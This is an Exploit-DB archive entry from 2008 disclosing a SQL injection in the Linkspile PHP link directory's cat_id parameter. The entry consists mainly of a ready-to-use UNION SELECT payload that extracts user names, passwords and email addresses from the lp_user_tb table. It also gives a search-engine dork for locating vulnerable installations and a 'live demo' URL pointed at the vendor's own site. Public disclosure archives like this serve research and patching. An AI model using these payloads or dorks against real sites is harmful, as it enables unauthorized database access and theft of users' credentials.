Linkspile - 'cat_id' SQL Injection

EDB-ID:

5611

CVE:

2008-2263

EDB Verified:

Author:

HaCkeR_EgY

Type:

webapps

Exploit: /

Platform:

PHP

Date:

2008-05-13

Vulnerable App:

##########################################################
#          Remote SQL Injection Vulnerabilities          #
#                 Linkspile  [ link.php ]                #
##########################################################
 
 
## Author : HaCkeR_EgY
 
## C0NTACT : hacker_egy@hotmail.com
 
## H^OME : www.PAL-HaCkeR.com   &  ATSDP.COM
 
## Script Name : Linkspile
 
## Download : http://www.linkspile.com
 
## Price :  $399.00  =======>  Buy iT : http://www.cmsnx.com/psf/order.php?id=10
###########################################################################
###########################################################################
 
## D0rk : Powered By linkspile
 
 
## ExPlo!T :
 
=====>> http://www.example.com/link.php?cat_id=-1/**/union/**/select/**/1,2,3,4,5,6,concat(fname,0x3a,0x3a,0x3a,password,0x3a,0x3a,0x3a,email),8,9,10,11,12,13,14,15,16,17,18/**/from/**/lp_user_tb/*
 
 
## L!ve Dem0 (Demo has changed the links.php filename):
 
 
======>>http://www.linkspile.com/linking.page.php?cat_id=-1/**/union/**/select/**/1,2,3,4,5,6,concat(fname,0x3a,0x3a,0x3a,password,0x3a,0x3a,0x3a,email),8,9,10,11,12,13,14,15,16,17,18/**/from/**/lp_user_tb/*
 
 
 
 
 
################################################################################

[<>] Thanx : MY Brotha and MY Master " Abo Mohamed "
 
[<>] Greetz : Mr.SQL , Mohamed el Arab ,F!resell, DaRk MaStEr , H-T Team , Stack-Terrorist
 
#################################################################################

# milw0rm.com [2008-05-13]

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services